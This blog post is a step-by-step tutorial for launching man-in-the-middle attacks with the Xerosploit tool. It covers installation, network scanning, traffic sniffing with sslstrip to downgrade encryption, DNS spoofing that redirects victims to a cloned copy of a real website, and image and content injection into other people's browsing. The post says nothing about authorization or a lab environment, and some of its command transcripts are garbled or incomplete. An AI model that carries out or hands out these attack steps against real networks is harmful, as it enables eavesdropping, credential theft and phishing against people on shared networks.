Launch Advanced Man in the Middle Attacks with Xerosploit

A Man-in-the-Middle (MitM) attack involves a hacker infiltrating a network, compelling nearby devices to connect directly to their machine. This allows them to eavesdrop on traffic and manipulate data. While Bettercap is a commonly used tool for MitM attacks, Xerosploit takes automation to the next level, streamlining high-level functions that would typically require more configuration in Bettercap.

Xerosploit's Foundation: Built upon tools like Bettercap and Nmap, Xerosploit automates their functions, enabling users to execute advanced concepts with just a few commands. This integration simplifies the execution of sophisticated attacks, making it more accessible for cybersecurity enthusiasts.

Considerations and Limitations: Xerosploit, while powerful, may not guarantee success in every scenario. Some webpages might be resistant to spoofing, especially if the target uses HTTPS or routes traffic through a VPN. Given that 73% of websites now utilize HTTPS, successful manipulation is limited to the remaining 27%, and only when VPNs are not in use.

Requirements: Xerosploit has been tested on Ubuntu and Kali Linux, and while it may work on macOS, it's explicitly designed for "Ubuntu / Kali Linux / Others" and "Parrot OS" during installation. Additionally, ensure your computer has the latest version of Python installed to run Xerosploit effectively.

This article will guide you through the installation process and showcase the capabilities of Xerosploit in executing advanced Man-in-the-Middle attacks on compatible systems.

Step 1:  Install Xerosploit

First, install Xerosploitoff GitHub using git clone.

~$ git clone https://github.com/LionSec/xerosploit
Cloning into 'xerosploit' ...
remote: Enumerating objects: 306, done.
remote: Total 306 (delta 0), reused 0 (delta 0), pack-reused 306
Receiving objects: 100% (306/306), 793.28 KiB | 2.38 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Then, change into its directory (cd) and start the installer using Python. It will ask you to select your operating system; if using Kali Linux, choose 1 and hit enter.

~$ cd xerosploit && sudo python install.py
[++] Please choose your operating system.
1) Ubuntu / Kali Linux / Others
2) Parrot OS
>>> 1
[++] Insatlling Xerosploit ......
Xerosploit has been successfully installed. Execute 'xerosploit' in your termninal.

Step 2:  Install the Dependencies

For Xerosploit to do its job correctly, you'll need all of the tools that it built its service on top of, including Nmap, hping3, build-essential, ruby-dev, libpcap-dev, and libgmp3-dev. If you're using Kali, you probably already have all of these.  

~/xerosploit$ sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev
Reading package lists ... Done
Building dependency try ... Done
Reading state information ... Done
build-essential is already the newest version (12.9).
build-essential set to manually installed.
hping3 is already the newest version (3.a2.ds2-10).
hping3 set to manually installed.
nmap is already the newest version (7.91+dfsg1-1kali1).
nmap set to manually installed.
ruby-dev is already the newest version (1:2.7+2).
ruby-dev set to manually installed.
libpcap-dev is already the newest version (1.9.1-r0).
libpcap-dev set to manually installed.
libgmp3-dev is already the newest version (2:6.0.0+dfsg-6).
libgmp3-dev set to manually installed.

And use Python to install tabulate and terminaltables, which will let Xerosploit display information to you in an easy-to-read way. You likely already have these tools too.

~/xerosploit$ sudo pip3 tabulate terminaltables
Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (0.8.7)
Requirement already satisfied: terminaltables in /usr/lib/python3/dist-packages (3.1.0)

Step 3:  View Xerosploit's Commands

Start Xerosploit with the xerosploit command. Right away, it will show you information on your network configuration.

~/xerosploit$ sudo xerosploit
[+] Please type 'help' to view commands.
Xero ➮

Type help to see all of the commands available in Xerosploit.

Xero ➮ help
[+] Please type 'help' to view commands.
Xero ➮

Step 4: Run a Scan to Identify Targets

First, we'll do some recon to identify a target by running the scan command, which runs on top of Nmap.

Xero ➮ scan
[++} Mapping your network ...
[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.
Xero ➮

You should see a list of IP addresses returned, and if all went well, one of those IP addresses would be the one you want to target. So, type in the IP address of the device you want to target. For me, it's the "kunshan" device.

Xero ➮ 192.168.32.7
[++] 192.168.32.7 ha been targeted.
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

Now, it will ask you which module you want to run against the target. If you don't know the module you want, type help to see a complete list.

Xero»modules ➮ help
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

Step 5: Replace All Images in the Target's Browser

Now, let's test out another module. To return to the module selection screen, type back and enter.

Xero»modules»shakescreen ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

Xerosploit has a fun attack tool called replace that will let us swap out all of the images loading on an HTTP-based webpage with any picture that we want.

Xero»modules ➮ replace
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘
[+] Enter 'run' to execute the 'replace' command.
Xero»modules»replace ➮

To start the Image Replace tool, type run, and it will immediately ask you to add the picture's path.

Xero»modules»replace ➮ run
[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)
Xero»modules»replace ➮

Find an image on your computer, then either type out the path or drag-and-drop the image into the terminal window to auto-populate it. Hit enter to start the attack.

Xero»modules»replace ➮ /root/Desktop/bg.png
[++] All images will be replaced by /root/Desktop/bg.png
[++] Press 'Ctrl + C' to stop .

Whenever an HTTP-based webpage loads on the target browser, all of its images will be replaced with the one image we chose. It doesn't always work 100%, so a few images may slip by unchanged, and it can be a little slow depending on the connection speed, but in general, it works pretty well.

It will continue to happen on every HTTP page until you stop the attack.

^C
Stopping MITM attack  ...
[+] Enter 'run' to execute the 'replace' command.
Xero»modules»replace ➮

Step 6: Capture Data Over the Network

Let's try another module. To return to the module selection screen, type back and enter.

Xero»modules»replace ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮

With the sniff module, we can capture some general data over the network.

Xero»modules ➮ sniff
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘
[+] Please type 'run' to execute the 'sniff' command.
Xero»modules»sniff ➮

Once the Sniffing tool is selected, type run to begin sniffing. It will then ask you if you want to load sslstrip, which will attempt to downgrade traffic so that we can pick up some interesting information that we might otherwise lose.

Xero»modules»sniff ➮ run
[+] Do you want to load sslstrip ? (y/n).
Xero»modules»sniff ➮ y
[++] All logs are saved on : /opt/xerosploit/xerosniff
[++] Sniffing on 192.168.8.215
[++] sslstrip : ON
[++] Press 'Ctrl + C' to stop .

A new window should open to show all of the packets being intercepted and saved to your computer. In the window, you can easily see which websites the target is visiting and what data is being requested and sent.

When you're done sniffing packets, you can stop the attack with Control-C on your keyboard. Then, you'll be asked if you want to save the logs or not. Use Y for yes, N for no.

^C
Stopping MITM attack  ...
[+] Do you want to save logs ? (y/n).
Xero»modules»sniff ➮ n
[++] Logs have been removed.
[+] Please type 'run' to execute the 'sniff' command.
Xero»modules»sniff ➮

Step 7: Run the DNS Spoofing Module on a Target

If you want to re-route traffic to a specific IP address, the dspoof module can help. But first, you'll want to create a fake website to redirect others to on the network. So, visit a website you want to copy, save its HTML file, and rename it “index.html.”

Next, open a separate terminal window and navigate to the same folder as the index.html file. Run the following command to create a local version of the webpage, changing the YOUR_IP part to the IP address of your machine.

~$ sudo python3 -m http.server --bind <your-ip> 80

Then, return to the terminal window with Xerosploit, and run the dspoof command. But first, return to the module selection screen. Then, open and run the DNS spoofing tool.

When asked, give your IP address as the address to redirect traffic to. All webpages that load will be the page you cloned!

Xero»modules»sniff ➮ back
[+] Which module do you want to load ? Enter 'help' for more information.
Xero»modules ➮ dspoof
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘
[+] Please type 'run' to execute the 'dspoof' command.
Xero»modules»dspoof ➮ run
[+] Enter the IP address where you want to redirect the traffic.
[++] Redirecting all the traffic to your IP address.
[++] Press 'Ctrl + C' to stop .

Step 8: Explore Other Modules

Discover additional modules within Xerosploit, each offering unique functionalities that can be both intriguing and enjoyable to experiment with.

• yplay:Seamlessly play a YouTube video in the background of web browsers.
• injectjs: Inject JavaScript into websites loaded by others on the network.
• injecthtml: Replace HTML content on websites loaded within the network.
• dos:Deny internet access to a specific IP address.
• pscan: Conduct a comprehensive port scan.
• ping:Ping a targeted device.
• rdownload: Substitute files being downloaded with your own.
• deface: Replace every webpage with your customized HTML.

Xerosploit serves as a compelling example of the potential risks associated with connecting to unfamiliar networks. While a VPN provides a level of protection, it's crucial to recognize that attackers may still find ways to manipulate your traffic. Exercise utmost caution by employing additional safeguards, such as utilizing a VPN, whenever uncertainty surrounds the security of the network you intend to connect to.

I hope you found How toLaunch Advanced Man-in-the-Middle Attacks with Xerosploitarticle helpful! If you have any questions about this guide, please leave a comment below or reach out to me on Twitter @amrelsagaei